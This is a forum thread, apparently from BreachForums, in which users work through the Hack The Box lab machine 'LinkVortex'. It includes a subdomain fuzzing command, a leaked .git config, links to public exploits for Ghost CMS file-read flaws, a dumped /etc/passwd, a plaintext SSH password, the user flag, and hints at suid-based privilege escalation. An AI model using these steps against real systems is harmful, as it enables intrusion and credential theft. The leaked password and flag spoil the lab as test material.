JOIN BREACHFORUMS TELEGRAM
HTB LinkVortex - Easy Linux
by cashiwoo - Saturday December 7, 2024 at 04:07 PM
Breached
Member
Posts: 5
Threads: 1
Joined: Apr 2024
Reputation: 0
#1
Dec 07, 2024, 04:07 PM
Starting thread for the box.

Quick OSINT regarding the machine name. Found Vortex Portal (as the box is easy it will definitely be some well known CVE). However, they are a bit old as for the HTB standards and the vulns are from 05' and were patched in 17'. Only other reoccurence I found is that  there may be a vulnerable 7z version embdeded into the platform usage.

Note: Those are just speculations ahead of the machine start. I'm eager to chat.

GL!

Links:
https://www.incibe.es/en/incibe-cert/ear...-2005-0879
https://cve.mitre.org/cgi-bin/cvename.cg...=2007-5842
https://www.exploit-db.com/exploits/25261
https://www.incibe.es/en/incibe-cert/ear...-2005-0879
https://nvd.nist.gov/vuln/detail/CVE-2007-3046
Reply
Breached
Member
Posts: 5
Threads: 1
Joined: Apr 2024
Reputation: 0
#2
Dec 07, 2024, 07:04 PM (This post was last modified: Dec 07, 2024, 07:22 PM by cashiwoo.)
ffuf -c -H "Host: FUZZ.linkvortex.htb" -u "http://linkvortex.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 230

dev [Status: 200, Size: 2538, Words: 670, Lines: 116, Duration: 29ms]
http://dev.linkvortex.htb/.git/config

[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://github.com/TryGhost/Ghost.git
fetch = +refs/tags/v5.58.0:refs/tags/v5.58.0


Vulnerable to CVE-2024-23724 or CVE-2023-40028
Reply
Banned

Posts: 69
Threads: 0
Joined: Aug 2024
Reputation: 2
#3
Dec 07, 2024, 07:23 PM (This post was last modified: Dec 07, 2024, 07:24 PM by hackemall.)
http://linkvortex.htb [200 OK] Apache, Country[RESERVED][ZZ], HTML5, HTTPServer[Apache], IP[10.10.11.47], JQuery[3.5.1], MetaGenerator[Ghost 5.58], Open-Graph-Protocol[website], PoweredBy[Ghost,a], Script[application/ld+json], Title[BitByBit Hardware], X-Powered-By[Express], X-UA-Compatible[IE=edge]
website is running Ghost CMS version 5.58

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
Breached
Member
Posts: 57
Threads: 1
Joined: Apr 2024
Reputation: 0
#4
Dec 07, 2024, 07:26 PM
Dump git repo on dev subdomain with git-dumper.
Admin credentials for ghost are in authentication.test.js

This works with some adaptions
https://github.com/RhinoSecurityLabs/CVE...2024-23724
But no idea yet what's the point / how to get RCE from that
Reply
GOD User
God
Posts: 75
Threads: 5
Joined: Sep 2024
Reputation: 62

GOD
#5
Dec 07, 2024, 08:21 PM
https://github.com/0xyassine/CVE-2023-40028  - Look into this - edit the URL and work from there - if you have not found login yet:

Hidden Content
You must register or login to view this content.

YOU WILL LOG IN LIKE THIS:

file> /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash
Reply
Breached
Member
Posts: 57
Threads: 1
Joined: Apr 2024
Reputation: 0
#6
Dec 07, 2024, 08:23 PM
(Dec 07, 2024, 08:21 PM)StingEm Wrote: https://github.com/0xyassine/CVE-2023-40028  - Look into this - edit the URL and work from there - if you have not found login yet:



YOU WILL LOG IN LIKE THIS:

file> /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash

Check the git repo again for the full path to the config file.
Use it to login with ssh and get the user flag.
Reply
Breached
Member
Posts: 22
Threads: 3
Joined: Oct 2024
Reputation: 0
#7
Dec 07, 2024, 08:29 PM
(Dec 07, 2024, 08:23 PM)ritualist Wrote:
(Dec 07, 2024, 08:21 PM)StingEm Wrote: https://github.com/0xyassine/CVE-2023-40028  - Look into this - edit the URL and work from there - if you have not found login yet:



YOU WILL LOG IN LIKE THIS:

file> /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash

Check the git repo again for the full path to the config file.
Use it to login with ssh and get the user flag.

from where did you get the login cred?
Reply
Banned

Posts: 25
Threads: 0
Joined: Nov 2024
Reputation: 0
#8
Dec 07, 2024, 08:39 PM
0000000000000000000000000000000000000000 299cdb4387763f850887275a716153e84793077d root <dev@linkvortex.htb> 1730322603 +0000 clone: from https://github.com/TryGhost/Ghost.git

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
Breached
Member
Posts: 57
Threads: 1
Joined: Apr 2024
Reputation: 0
#9
Dec 07, 2024, 08:39 PM (This post was last modified: Dec 07, 2024, 08:45 PM by ritualist.)
Dockerfile.ghost has the path to the config file
Use https://github.com/0xyassine/CVE-2023-40028 to read it

For root you can either use chained symlinks to get the root flag / ssh key or just put your code for e.g. a suid bash in the CHECK_CONTENT variable.
Reply
Advanced User

Posts: 62
Threads: 18
Joined: Aug 2024
Reputation: 16
#10
Dec 07, 2024, 08:45 PM
(Dec 07, 2024, 08:23 PM)ritualist Wrote:
(Dec 07, 2024, 08:21 PM)StingEm Wrote: https://github.com/0xyassine/CVE-2023-40028  - Look into this - edit the URL and work from there - if you have not found login yet:



YOU WILL LOG IN LIKE THIS:

file> /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash

Check the git repo again for the full path to the config file.
Use it to login with ssh and get the user flag.

Thank you...
└─$ ssh bob@linkvortex.htb
bob@linkvortex.htb's password: fibber-talented-worth
bob@linkvortex:~$ ls
user.txt
bob@linkvortex:~$ cat user.txt
6e6acfb2b564ecec3c71c2963bb3cf85
bob@linkvortex:~$
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 66 1,783 4 hours ago
Last Post: vlka
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 370 92,504 9 hours ago
Last Post: lifolifo007
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,214 Yesterday, 02:10 PM
Last Post: kkkato
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 20 2,525 Apr 29, 2026, 11:06 PM
Last Post: op334
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 3 414 Apr 29, 2026, 10:36 PM
Last Post: op334

Forum Jump:


 Users browsing this forum: 1 Guest(s)